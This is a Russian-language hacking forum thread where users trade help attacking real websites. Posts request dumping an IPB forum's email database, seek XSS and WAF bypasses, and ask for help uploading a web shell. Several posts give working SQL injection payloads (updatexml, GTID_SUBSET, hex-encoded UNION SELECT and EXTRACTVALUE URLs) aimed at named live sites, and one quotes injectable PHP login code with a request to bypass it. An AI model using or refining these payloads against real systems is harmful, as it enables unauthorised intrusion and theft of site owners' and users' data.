Ваши вопросы по уязвимостям.

Спасибо капитан очевидность.
Иди лучше дальше мёртвые сайты крути )

 

Подскажите кто можете помочь с одного IPB форума (v 3.3.4) скачать БД емыйлов?
(пишите в личку)

 

https://www.exploit-db.com
https://0day.today
Найдёшь тут эксплоит тебе повезло не найдёшь значит не повезло

 

Он мне писал, у меня просто нету времени крутить, там есть sql inject и WAF

 

ребят, приветствую!

Можно ли как нибудь заюзать XSS если фильтруются <> , то есть <img src="x"> = пустое место

 

Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-

Эх, никто таки сделал.Вопрос закрыт

 

http://www.alphaonenow.org/searchresults.php
В поиске 'and updatexml(NULL,concat(0x0a,(SELECT 1)),Null)--'

 

PHP:

<?php
@session_start();

    $conn = mysql_connect(localhost, root, 1) or die("Cannot connect to the Host");
    mysql_select_db(123, $conn) or die("Cannot connect to the Database");
    
    /*-------------------------For login-------------------------------------------------------*/
    if(isset($_REQUEST['logbtn_x']))
    {
        $AdminUserName=$_REQUEST['AdminUserName'];
        $AdminPassword=$_REQUEST['AdminPassword'];
        
        $sql_login="select * from admin where admin_username='".$AdminUserName."' and admin_password='".$AdminPassword."'";
        $res_login=mysql_query($sql_login) or mysql_error();
        $fetchinfo=mysql_fetch_array($res_login);
        
        $User_name=$fetchinfo['admin_username'];
        $User_password=$fetchinfo['admin_password'];
        $User_id=$fetchinfo['admin_id'];
        
        if($User_name==$AdminUserName && $User_password==$AdminPassword)
            {
                $_SESSION['AdminUserName']=$User_name;
                $_SESSION['AdminId']=$User_id;
                $_SESSION['AdminPrevilage']=$User_type;
                
                echo "<script>window.location.href='home.php';</script>";
            }
        else
            {
                $message="Invalid Username or password !";
            }   
    
    }
    
    /*-------------------------End of login----------------------------------------------------*/
?>

                                    <form name="loginbox" id="loginbox" method="post" action="" onsubmit="return logvalid()">
                                        <table width="100%" border="0" cellpadding="2" cellspacing="2" id="innertable" style="background-color:#FFFFFF">
                                            <tr>
                                                <td colspan="2" align="left" class="Error"><?=$message?></td>
                                            </tr>
                                            
                                            <tr>
                                                <td class="adminlogtext" align="left" style="font-size:14px">User&nbsp;Name</td>
                                                <td align="right" style="padding-right:10px;"><input type="text" name="AdminUserName" id="AdminUserName" value="<?=$_REQUEST['AdminUserName']?>" class="textbox" style="width:150px"/></td>
                                            </tr>
                                            
                                            <tr>
                                                <td class="adminlogtext" align="left" style="font-size:14px">Password</td>
                                                <td align="right" style="padding-right:10px;"><input type="password" name="AdminPassword" id="AdminPassword" value="<?=$_REQUEST['AdminPassword']?>"  class="textboxpwd" style="width:150px"/></td>
                                            </tr>
                                            
                                            <tr>
                                                <td>&nbsp;</td>
                                                <td align="right" style="padding-right:10px;"><input type="image" src="images/login_button.png" name="logbtn" id="logbtn" title="login_button" style="border:0px;" /></td>
                                            </tr>
                                        </table>
                                    </form>
                             

Есть возможность обойти ?

 

загугли sql injection

 

Помогите пожалуйста:

PHP:

0x676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d33392b554e694f6e2b53654c4563542b312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c3236

 

PHP:

0x687474703a2f2f676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d312b414e442b4558545241435456414c55452832322c434f4e43415428307835632c2876657273696f6e28292929292b2d2d2b2d

 

Спасибо братан

 

Отправляй через POST. Там видимо $_REQUEST['news_id'].

Code:

http://www.alphaonenow.org/story.php
POST: news_id = 4341 and GTID_SUBSET((SELECT database()),0)-- a

Слово "select" хорошо фильтруется, но жаль, что фильтр работает только на GET-параметрах.

 

https://forum.antichat.ru/threads/21336/page-716#post-2897553
Как такие запросы дедектить, методом тыка? Встречал всего 3-5 ресурсов, но скорее у меня был тупо метод тыка.

 

https://forum.antichat.ru/threads/424557/page-117#post-4204250

 

А через юнион селект не получиться? Я вроде подобрал ко-во полей.. Подумал может что-то можно сделать, было бы круто.

 

Всем привет,такой вопрос,есть скуля с root правами,есть пути,винда сервер php,путаюсь лить шеел но выяснилось что стоит PDO есть умелци кто такое может обойти?

 

Помогите раскрутить данную уязвимость
http://www.lsrrealestate-m.ru/offers/?id=1433'
Ошибка выводиться не на страницу а в адресную строку.

 

Это не sql inj вроде.

 

http://www.lsrrealestate-m.ru/common/500/?errmessage=28.04.2018 18:10:52
ASPCode=
Source=
Category=Microsoft VBScript runtime
File=/template_offers.asp
Line=35
Column=-1
Description=Type mismatch: '[string: "1433'"]'
Column=
ref=
url=www.lsrrealestate-m.ru/offers/Default.asp?id=1433%27
тут нет sqlini